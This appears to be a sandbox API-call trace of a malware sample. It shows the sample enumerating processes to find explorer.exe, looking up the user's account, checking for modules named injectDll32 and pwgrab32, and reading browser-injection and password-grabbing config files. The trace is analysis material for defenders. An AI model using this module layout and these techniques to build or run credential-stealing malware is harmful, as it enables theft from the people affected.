	[0234.090] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.090] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.091] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.091] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.092] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.092] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.092] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.093] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.093] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.093] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.094] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.094] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0234.095] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0234.095] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.096] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.096] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0234.097] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0234.097] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0234.098] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0234.098] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.099] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.099] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0234.099] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0234.099] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0234.100] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0234.100] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0234.101] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0234.101] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0234.102] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0234.102] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0234.103] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0234.103] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0234.104] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0234.104] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0234.105] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0234.105] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0234.105] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0234.105] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0234.106] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0234.106] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0234.107] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0234.107] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0234.108] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0234.108] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0234.109] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0234.109] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0234.148] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0234.148] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0234.149] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0234.149] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0234.149] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0234.150] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0234.150] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0234.150] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0234.151] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0234.151] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0234.152] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0234.152] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0234.153] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0234.153] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0234.154] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0234.154] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0234.155] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0234.155] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0234.155] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0234.155] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0234.156] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0234.157] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0234.158] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0234.158] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.159] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.159] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.159] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.159] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.160] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.160] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.161] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.161] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0234.162] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0234.162] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0234.163] lstrcmpW (lpString1="explorer.exe", lpString2="dllhost.exe") returned 1
	[0234.163] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.164] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.164] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.165] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0234.165] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0234.165] CloseHandle (hObject=0x5f8) returned 1
	[0234.165] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad348
	[0234.165] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad318
	[0234.165] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311630
	[0234.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x5f8
	[0234.166] OpenProcessToken (in: ProcessHandle=0x5f8, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x5e8) returned 1
	[0234.166] GetTokenInformation (in: TokenHandle=0x5e8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0234.166] GetLastError () returned 0x7a
	[0234.166] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6340
	[0234.166] GetTokenInformation (in: TokenHandle=0x5e8, TokenInformationClass=0x1, TokenInformation=0x22a6340, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x22a6340, ReturnLength=0x128c98) returned 1
	[0234.166] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a6348*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0234.166] CloseHandle (hObject=0x5e8) returned 1
	[0234.166] CloseHandle (hObject=0x5f8) returned 1
	[0234.166] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231c838
	[0234.166] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad348) returned 1
	[0234.166] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d9e0
	[0234.166] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad348
	[0234.166] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311738
	[0234.166] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0234.166] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0234.167] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0234.167] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0234.167] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0234.167] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231d9e0) returned 1
	[0234.167] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311738) returned 1
	[0234.167] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad348) returned 1
	[0234.167] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad318) returned 1
	[0234.167] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225eb8
	[0234.167] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0234.167] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0234.167] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0234.167] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0234.167] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0234.167] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0234.167] Sleep (dwMilliseconds=0x4e20) 
	[0234.173] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x736c2500, dwHighDateTime=0x1d50a6a)) 
	[0234.173] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0234.173] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x624
	[0234.173] GetFileTime (in: hFile=0x624, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.173] CloseHandle (hObject=0x624) returned 1
	[0234.173] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x736c2500, dwHighDateTime=0x1d50a6a)) 
	[0234.173] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x624
	[0234.173] GetFileTime (in: hFile=0x624, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.174] CloseHandle (hObject=0x624) returned 1
	[0234.174] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x736c2500, dwHighDateTime=0x1d50a6a)) 
	[0234.174] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x624
	[0234.174] GetFileTime (in: hFile=0x624, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.174] CloseHandle (hObject=0x624) returned 1
	[0234.174] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x736c2500, dwHighDateTime=0x1d50a6a)) 
	[0234.174] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0234.174] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x624
	[0234.174] GetFileTime (in: hFile=0x624, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.174] CloseHandle (hObject=0x624) returned 1
	[0234.174] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x736c2500, dwHighDateTime=0x1d50a6a)) 
	[0234.174] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
